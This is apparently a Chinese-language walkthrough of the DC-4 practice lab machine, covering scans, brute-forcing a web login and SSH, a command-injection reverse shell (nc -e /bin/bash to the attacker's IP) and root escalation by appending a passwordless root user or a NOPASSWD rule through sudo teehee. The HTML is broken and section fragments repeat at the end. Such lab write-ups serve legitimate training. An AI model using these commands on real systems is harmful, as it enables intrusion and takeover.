DC-4 靶机渗透测试详细教程<\/h1>

靶机信息<\/h2>

将DC-4靶机导入虚拟机软件(VMware\/VirtualBox)<\/li>

渗透测试流程<\/h2>

使用以下命令发现靶机IP:<\/p>

arp-scan -l
<\/span><\/span># 或<\/span>
<\/span><\/span>nmap -sn 192.168.1.0\/24
<\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3>
nmap -p- <靶机IP>
<\/span><\/span><\/code><\/pre>发现开放端口:<\/p>

22 (SSH)<\/li>
80 (HTTP)<\/li>
<\/ul>
详细服务扫描:<\/p>
nmap -p80,22 -sV -A <靶机IP>
<\/span><\/span><\/code><\/pre>3. Web服务识别<\/h3>
whatweb http:\/\/<靶机IP>
<\/span><\/span><\/code><\/pre>未发现特别有价值的信息<\/p>
4. Web渗透<\/h3>
登录页面分析<\/h4>
访问Web界面发现管理员登录页面<\/p>
暴力破解<\/h4>

输入用户名admin<\/code>和任意密码<\/li>
使用Burp Suite拦截登录请求<\/li>
发送到Intruder模块进行暴力破解<\/li>
通过响应大小判断成功密码为happy<\/code><\/li>
<\/ol>
命令执行漏洞<\/h4>

使用admin:happy<\/code>登录后台<\/li>
发现"Command"功能可以执行命令<\/li>
尝试执行whoami<\/code>确认命令执行漏洞<\/li>
抓包修改命令为反弹shell:<\/li>
<\/ol>
radio=nc+-e+\/bin\/bash+<攻击机IP>+8888&submit=跑
<\/code><\/pre>

在Kali上监听:<\/li>
<\/ol>
nc -lvnp 8888<\/span>
<\/span><\/span><\/code><\/pre>稳定shell<\/h4>
获取基本shell后升级为稳定shell:<\/p>
python -c "import pty;pty.spawn('\/bin\/bash')"<\/span>
<\/span><\/span><\/code><\/pre>5. SSH暴力破解<\/h3>
用户发现<\/h4>
在\/home<\/code>目录发现三个用户:<\/p>

charles<\/li>
jim<\/li>
sam<\/li>
<\/ul>
其中\/home\/jim<\/code>目录下有文件:<\/p>

backups<\/li>
old-passwords.bak<\/li>
test.sh<\/li>
<\/ul>
密码提取<\/h4>
从old-passwords.bak<\/code>获取密码列表<\/p>
Hydra爆破<\/h4>

创建用户列表user.txt<\/code>:<\/li>
<\/ol>
charles
jim
sam
<\/code><\/pre>

使用old-passwords.bak<\/code>作为密码字典<\/li>
执行爆破:<\/li>
<\/ol>
hydra -L user.txt -P old-passwords.bak ssh:\/\/<靶机IP>
<\/span><\/span><\/code><\/pre>成功爆破出jim的密码<\/p>
6. SSH登录<\/h3>
使用爆破出的密码登录jim账户:<\/p>
ssh jim@<靶机IP>
<\/span><\/span><\/code><\/pre>7. 横向提权<\/h3>
邮件信息<\/h4>
检查jim的邮件:<\/p>
cat \/var\/mail\/jim
<\/span><\/span><\/code><\/pre>发现charles发来的邮件包含SSH密码<\/p>
登录charles账户<\/h4>
使用邮件中的密码登录charles账户:<\/p>
ssh charles@<靶机IP>
<\/span><\/span><\/code><\/pre>8. 权限提升<\/h3>
sudo权限检查<\/h4>
sudo -l
<\/span><\/span><\/code><\/pre>发现charles可以以root权限执行\/usr\/bin\/teehee<\/code><\/p>
teehee利用<\/h4>

查看帮助:<\/li>
<\/ol>
teehee --help
<\/span><\/span><\/code><\/pre>发现-a<\/code>参数可以追加内容<\/p>

方法一: 添加root权限用户<\/li>
<\/ol>
echo "admin::0:0:admin:\/root:\/bin\/bash"<\/span> | sudo teehee -a \/etc\/passwd
<\/span><\/span><\/code><\/pre>然后切换用户:<\/p>
su - admin
<\/span><\/span><\/code><\/pre>
方法二: 修改sudoers文件<\/li>
<\/ol>
echo "charles ALL=(ALL:ALL)NOPASSWD:ALL"<\/span> | sudo teehee -a \/etc\/sudoers
<\/span><\/span><\/code><\/pre>获取root权限<\/h4>
成功提权后即可获取root shell<\/p>
总结<\/h2>
渗透路径:<\/p>

Web登录暴力破解 → 后台命令执行 → 反弹shell<\/li>
发现用户密码 → SSH爆破 → 获取jim权限<\/li>
邮件信息 → 获取charles权限<\/li>
sudo提权 → 获取root权限<\/li>
<\/ol>
关键点:<\/p>

Web应用暴力破解<\/li>
命令注入漏洞利用<\/li>
密码重用导致的横向移动<\/li>
不安全的sudo配置导致的权限提升<\/li>
<\/ul>

DC-4 靶机渗透测试详细教程<\/h1>

渗透测试流程<\/h2>

4. Web渗透<\/h3>

登录页面分析<\/h4> 访问Web界面发现管理员登录页面<\/p>

5. SSH暴力破解<\/h3>

密码提取<\/h4> 从old-passwords.bak<\/code>获取密码列表<\/p>

7. 横向提权<\/h3>

8. 权限提升<\/h3>

获取root权限<\/h4> 成功提权后即可获取root shell<\/p>

登录页面分析<\/h4>
访问Web界面发现管理员登录页面<\/p>

密码提取<\/h4>
从`old-passwords.bak<\/code>获取密码列表<\/p>`

获取root权限<\/h4>
成功提权后即可获取root shell<\/p>